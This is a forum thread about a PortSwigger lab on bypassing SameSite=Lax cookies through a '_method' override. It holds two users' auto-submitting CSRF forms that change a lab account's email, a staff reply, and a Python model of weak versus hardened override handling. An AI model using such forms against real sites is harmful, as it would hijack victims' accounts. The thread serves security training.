Burp Suite User Forum


Lab: SameSite Lax bypass via method override

Bora | Last updated: Jul 08, 2024 12:57PM UTC

When I click on "View Exploit" it changes my email. After that I change the email and click on "Deliver exploit to victim", but it doesn't solve my lab.

    <html>
    <body>
    <form method="GET" action="https://0a92003804a9626c8024c11a001a0099.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="_method" value="POST">
    <input type="hidden" name="email" value="haydari@gmail.com">
    </form>
    <script>
    document.forms[0].submit();
    </script>
    </body>
    </html>

Ben, PortSwigger Agent | Last updated: Jul 09, 2024 07:27AM UTC

Hi Bora, your exploit appears to successfully solve this particular lab when I use it - are you still having issues with this as of right now?

J | Last updated: Jul 21, 2024 10:32AM UTC

Hey, I too am experiencing trouble solving the lab. I am using the following payload:

    <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <form action="https://0a3100fd0339eaf885d976d8006500c4.web-security-academy.net/my-account/change-email" method="GET">
    <input type="hidden" name="_method" value="POST">
    <input type="hidden" name="email" value="test20&#64;test&#46;com" />
    <input type="submit" value="Submit request" />
    </form>
    <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
    </script>
    </body>
    </html>

Despite succeeding when clicking "View exploit", after clicking "Store" followed by "Deliver..." the lab is not solved. I have tried via Burp Suite's browser and Google Chrome. Would appreciate any feedback. Thanks

Ben, PortSwigger Agent | Last updated: Jul 22, 2024 12:04PM UTC

Hi, Just to clarify, you are still looking at the 'SameSite Lax bypass via method override' lab? If so, have you tried using the written solution for this?
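The payloads above work because the lab's server lets a `_method=POST` parameter on a plain GET navigation (which still carries a SameSite=Lax session cookie) be treated as a POST. The following is an added model, not the lab's or PortSwigger's code, that shows the weak override handling beside a hardened variant that only honours `_method` from the body of a real POST; the site name, request model and e-mail values are constructed for the example.

```python
from urllib.parse import parse_qs, urlsplit

APP_SITE = "https://app.example"  # assumed site of the protected application


def lax_cookie_attached(initiator_site: str, target_url: str, method: str) -> bool:
    """Model of SameSite=Lax: the session cookie is attached on same-site
    requests and on cross-site top-level navigations that use GET, but not
    on cross-site POSTs."""
    t = urlsplit(target_url)
    return f"{t.scheme}://{t.netloc}" == initiator_site or method == "GET"


def effective_method(method: str, query: dict, form: dict, hardened: bool) -> str:
    """Apply a framework-style `_method` override. The weak variant honours
    it wherever it appears, including the query string of a GET; the
    hardened variant only honours an override carried in a real POST body."""
    if method == "POST" and "_method" in form:
        return form["_method"][0].upper()
    if not hardened and "_method" in query:
        return query["_method"][0].upper()
    return method


def change_email(initiator_site: str, target_url: str, method: str,
                 form: dict, hardened: bool):
    """Return the accepted e-mail address, or None if the request is rejected.
    All request values passed in are constructed for this model."""
    query = parse_qs(urlsplit(target_url).query)
    if not lax_cookie_attached(initiator_site, target_url, method):
        return None  # no session: the browser withheld the Lax cookie
    if effective_method(method, query, form, hardened) != "POST":
        return None  # state changes are only accepted over POST
    email = (form.get("email") or query.get("email") or [None])[0]
    return email


if __name__ == "__main__":
    target = APP_SITE + "/my-account/change-email?_method=POST&email=x%40y.test"
    # Cross-site GET navigation with the override parameter (constructed):
    print(change_email("https://other.example", target, "GET", {}, hardened=False))  # x@y.test
    print(change_email("https://other.example", target, "GET", {}, hardened=True))   # None
```

Rejecting the override on GET (or not accepting GET at all on state-changing endpoints) is what closes the gap; a per-session CSRF token remains the usual defence in depth on top of SameSite.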
